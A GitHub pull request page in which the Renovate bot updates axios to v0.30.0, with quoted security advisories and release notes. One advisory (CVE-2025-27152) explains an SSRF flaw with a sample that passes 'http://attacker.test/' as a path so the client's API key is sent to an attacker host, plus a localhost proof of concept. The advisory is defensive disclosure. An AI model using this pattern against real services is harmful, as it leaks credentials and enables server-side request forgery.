Skip to content

chore(deps): update dependency axios to v0.30.0 [security]#183

Merged
renovate[bot] merged 1 commit intomainfrom
renovate/npm-axios-vulnerability
Apr 20, 2025
Merged

chore(deps): update dependency axios to v0.30.0 [security]#183
renovate[bot] merged 1 commit intomainfrom
renovate/npm-axios-vulnerability

Conversation

@renovate
Copy link
Copy Markdown
Contributor

@renovate renovate Bot commented Nov 11, 2023
edited
Loading

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
axios (source) 0.27.2 -> 0.30.0 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2023-45857

An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.

CVE-2025-27152

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).
Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:

import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

  • When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
  • Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

PoC

Follow the steps below to reproduce the issue:

  1. Set up two simple HTTP servers:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html 
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
  1. Create a script (e.g., main.js):
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
  1. Run the script:
$ node main.js
this is server2

Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact

  • Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
  • SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
  • Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.

Release Notes

axios/axios (axios)

v0.30.0

Compare Source

Release notes:

Bug Fixes
Contributors to this release

Full Changelog: axios/axios@v0.29.0...v0.30.0

v0.29.0

Compare Source

Release notes:

Bug Fixes
Contributors to this release

v0.28.1

Compare Source

Release notes:

Release notes:

Bug Fixes
  • fix(backport): custom params serializer support (#​6263)
  • fix(backport): uncaught ReferenceError req is not defined (#​6307)

v0.28.0

Compare Source

Release notes:

Bug Fixes
Backports from v1.x:
  • Allow null indexes on formSerializer and paramsSerializer v0.x (#​4961)
  • Fixing content-type header repeated #​4745
  • Fixed timeout error message for HTTP 4738
  • Added axios.formToJSON method (#​4735)
  • URL params serializer (#​4734)
  • Fixed toFormData Blob issue on node>v17 #​4728
  • Adding types for progress event callbacks #​4675
  • Fixed max body length defaults #​4731
  • Added data URL support for node.js (#​4725)
  • Added isCancel type assert (#​4293)
  • Added the ability for the url-encoded-form serializer to respect the formSerializer config (#​4721)
  • Add string[] to AxiosRequestHeaders type (#​4322)
  • Allow type definition for axios instance methods (#​4224)
  • Fixed AxiosError stack capturing; (#​4718)
  • Fixed AxiosError status code type; (#​4717)
  • Adding Canceler parameters config and request (#​4711)
  • fix(types): allow to specify partial default headers for instance creation (#​4185)
  • Added blob to the list of protocols supported by the browser (#​4678)
  • Fixing Z_BUF_ERROR when no content (#​4701)
  • Fixed race condition on immediate requests cancellation (#​4261)
  • Added a clear() function to the request and response interceptors object so a user can ensure that all interceptors have been removed from an Axios instance https://github.com/axios/axios/pull/4248
  • Added generic AxiosAbortSignal TS interface to avoid importing AbortController polyfill (#​4229)
  • Fix TS definition for AxiosRequestTransformer (#​4201)
  • Use type alias instead of interface for AxiosPromise (#​4505)
  • Include request and config when creating a CanceledError instance (#​4659)
  • Added generic TS types for the exposed toFormData helper (#​4668)
  • Optimized the code that checks cancellation (#​4587)
  • Replaced webpack with rollup (#​4596)
  • Added stack trace to AxiosError (#​4624)
  • Updated AxiosError.config to be optional in the type definition (#​4665)
  • Removed incorrect argument for NetworkError constructor (#​4656)

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot added the deps label Nov 11, 2023
@renovate renovate Bot requested a review from mathe42 November 11, 2023 03:55
@renovate renovate Bot changed the title chore(deps): update dependency axios to v1 [security] chore(deps): update dependency axios to v1 [security] - autoclosed Feb 20, 2024
@renovate renovate Bot closed this Feb 20, 2024
@renovate renovate Bot deleted the renovate/npm-axios-vulnerability branch February 20, 2024 22:24
@renovate renovate Bot restored the renovate/npm-axios-vulnerability branch February 22, 2024 01:53
@renovate renovate Bot changed the title chore(deps): update dependency axios to v1 [security] - autoclosed chore(deps): update dependency axios to v1 [security] Feb 22, 2024
@renovate renovate Bot reopened this Feb 22, 2024
@renovate renovate Bot force-pushed the renovate/npm-axios-vulnerability branch from a14166a to f151cbc Compare February 22, 2024 01:53
@renovate renovate Bot changed the title chore(deps): update dependency axios to v1 [security] chore(deps): update dependency axios to v0.28.0 [security] Feb 22, 2024
@renovate renovate Bot force-pushed the renovate/npm-axios-vulnerability branch from f151cbc to a536588 Compare February 26, 2024 22:52
@renovate renovate Bot force-pushed the renovate/npm-axios-vulnerability branch from a536588 to 44d35f3 Compare November 30, 2024 22:56
@renovate renovate Bot force-pushed the renovate/npm-axios-vulnerability branch from 44d35f3 to b4a955c Compare March 7, 2025 21:53
@renovate renovate Bot changed the title chore(deps): update dependency axios to v0.28.0 [security] chore(deps): update dependency axios to v1 [security] Mar 7, 2025
@renovate renovate Bot force-pushed the renovate/npm-axios-vulnerability branch from b4a955c to ab33c22 Compare March 28, 2025 18:59
@renovate renovate Bot changed the title chore(deps): update dependency axios to v1 [security] chore(deps): update dependency axios to v0.28.0 [security] Mar 28, 2025
@renovate renovate Bot force-pushed the renovate/npm-axios-vulnerability branch 3 times, most recently from c7eb8a5 to 1efc0e5 Compare April 20, 2025 06:00
@renovate renovate Bot changed the title chore(deps): update dependency axios to v0.28.0 [security] chore(deps): update dependency axios to v0.30.0 [security] Apr 20, 2025
@renovate renovate Bot force-pushed the renovate/npm-axios-vulnerability branch from 1efc0e5 to b2ae261 Compare April 20, 2025 06:00
@renovate renovate Bot merged commit b5ab855 into main Apr 20, 2025
1 check passed
@renovate renovate Bot deleted the renovate/npm-axios-vulnerability branch April 20, 2025 11:08
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@mathe42 mathe42 Awaiting requested review from mathe42

Assignees

@mathe42 mathe42

Labels

deps

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@mathe42